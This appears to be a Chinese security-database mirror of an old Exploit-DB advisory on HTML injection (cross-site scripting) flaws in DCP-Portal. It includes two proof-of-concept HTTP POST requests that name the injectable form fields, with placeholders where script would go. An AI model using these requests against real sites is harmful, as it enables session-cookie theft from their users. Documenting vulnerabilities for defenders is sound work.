DCP-Portal 3.7/4.x/5.x – Multiple HTML Injection Vulnerabilities

DCP-Portal 3.7/4.x/5.x – Multiple HTML Injection Vulnerabilities

漏洞ID 1054705 漏洞类型
发布时间 2004-10-06 更新时间 2004-10-06
图片[1]-DCP-Portal 3.7/4.x/5.x – Multiple HTML Injection Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-DCP-Portal 3.7/4.x/5.x – Multiple HTML Injection Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24664
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11339/info

DCP-Portal is reported prone to multiple HTML injection vulnerabilities. It is reported that DCP-Portal does not sufficiently filter data submitted via input fields in several scripts.

These vulnerabilities may permit execution of hostile script code when a user views pages that include the injected code. The hostile code would be rendered in the context of the site hosting the vulnerable software. Exploitation could allow for theft of cookie-based authentication credentials. Other attacks are also possible since the attacker may influence how pages within the DCP-Portal are rendered to users.

POST /index.php?page=send_write HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS code here]


POST /register.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

PHPSESSID=1&sex=1&sex=1&name=1&surname=1&[email protected]&ad
dress=1&zip=1&city=1&country=[XSS code here]

相关推荐: pwdutils Unauthorized Root Password Modification Vulnerability

pwdutils Unauthorized Root Password Modification Vulnerability 漏洞ID 1102170 漏洞类型 Design Error 发布时间 2002-05-08 更新时间 2002-05-08 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享